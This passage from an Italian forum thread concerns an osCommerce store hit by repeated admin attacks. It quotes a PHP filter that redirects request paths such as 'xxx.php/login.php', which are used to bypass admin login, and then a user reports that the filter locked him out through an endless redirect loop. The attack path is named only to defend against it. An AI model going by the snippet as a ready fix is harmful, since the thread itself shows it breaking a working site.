  $url_php_self = !isset($_SERVER['SCRIPT_NAME']) ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
  if (
          ( (substr_count($url_php_self, ".php/" . FILENAME_LOGIN) ) != 0)
       || ( (substr_count($url_php_self, ".php/" . FILENAME_PASSWORD_FORGOTTEN) ) != 0)
       || ( (substr_count($url_php_self, ".php/" . FILENAME_FORBIDDEN) ) != 0)
       || ( (substr_count($url_php_self, ".php") ) >= 2)
     ) {
    tep_redirect(tep_href_link('index.php'));
  }
  if (basename($url_php_self) != $PHP_SELF) {
    tep_redirect(tep_href_link('index.php'));
  }

Re: Attacco Hacker no-stop

Inviato: 21/03/2011, 0:41
da cucuzza1
-Scusa ma volevo ascoltare il tuo consiglio ma ho un problema.
<Ho inserito nel lato admin nella cartella includes e poi in application_top la stringa che hai dato ma ora non mi fa più accedere al mio pannello.
Ora non solo non posso inserire la stringa nell'altra cartella, ma non riesco proprio ad entrare lato admin quindi come vedo le mie vendite??
Chi può aiutarmi almeno a farmi entrare per cancellare quella stringa...??

Re: Attacco Hacker no-stop

Inviato: 21/03/2011, 10:01
da cucuzza1
Ecco cosa mi dice Mozilla:

Questa pagina non reindirizza in modo corretto

Firefox ha rilevato che il server sta reindirizzando la richiesta per questa pagina in modo che non possa mai essere completata.

* Questo problema spesso è causato dal blocco o dal rifiuto dei cookie.

Re: Attacco Hacker no-stop

Inviato: 21/03/2011, 10:15
da cucuzza1
Ragazzi, ho risolto facilmente andando a cancellare la modifica direttamente dal file manager sul mio spazio web.
Comunque sono curioso di capire perchè non ha funzionato..
Se qualcuno lo sa...

Re: Attacco Hacker no-stop

Inviato: 21/03/2011, 10:26
da maury2ma
sopratutto dipende se hai application_top aggiornato con i fix alla sicurezza della versione 2.3.1, se hai mod particolari inclusi e tante altre cose..
insomma devi adattarti il codice in base ai tuoi file.
il controllo di per se è semplice:
controlla che non ci sia scritto
xxx.php/login.php
o log off o password dimenticata
poi controlla che non ci siano nell'indirizzo 2 file".php"
nel qual caso reinderizza al file login.
Tutti gli orari sono UTC+02:00
Pagina 1 di 2

Creato da phpBB® Forum Software © phpBB Limited

Traduzione Italiana phpBB-Italia.it